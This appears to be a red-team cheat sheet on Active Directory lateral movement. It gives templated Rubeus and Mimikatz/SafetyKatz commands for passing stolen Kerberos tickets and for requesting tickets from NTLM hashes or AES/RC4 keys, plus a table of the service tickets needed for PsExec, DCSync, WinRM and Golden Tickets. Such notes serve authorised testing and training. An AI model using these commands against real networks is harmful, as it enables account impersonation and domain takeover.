Lateral Movement
This section collects techniques for lateral movement in an Active Directory infrastructure.
In the Pass the Ticket technique, an attacker obtains a valid Kerberos ticket-granting ticket (TGT) by stealing it from a user or extracting it from a computer's memory. With that TGT the attacker can request service tickets for other systems without authenticating again.
You can perform this technique with Rubeus:
```powershell
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:<DOMAIN> /username:<USERNAME> /password:FakePass123 /ticket:<TICKET>
```
Which service tickets you need depends on the task you want to perform:

| Service Type | Required Tickets |
|---|---|
| Windows File Share (PsExec) | CIFS |
| LDAP Operations (DCSync) | LDAP |
| WinRM | HOST, HTTP, WINRM |
| WMI | HOST, RPCSS |
| PowerShell Remoting | HOST, HTTP; depending on OS: WSMAN, RPCSS |
| Scheduled Tasks | HOST |
| Windows Remote Server Administration Tools | RPCSS, LDAP, CIFS |
| Golden Tickets | krbtgt |
This technique requests a Kerberos TGT for a user from their NTLM hash or AES/RC4 key instead of their password.
- Does not require high privileges:
```powershell
.\Rubeus.exe asktgt /nowrap /user:<USER> [/ntlm:<HASH_NTLM>|/aes256:<AES256_KEY>|/rc4:<RC4_KEY>] /opsec /show /ptt createnetonly /program:C:\Windows\System32\cmd.exe
```
- Requires high privileges:
```powershell
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER2IMPERSONATE> /domain:<DOMAIN> /aes256:<AES256_KEY> /run:powershell.exe"'
SafetyKatz.exe "sekurlsa::pth /user:<USER2IMPERSONATE> /domain:<DOMAIN> /aes256:<AES256_KEY> /run:cmd.exe" "exit"
```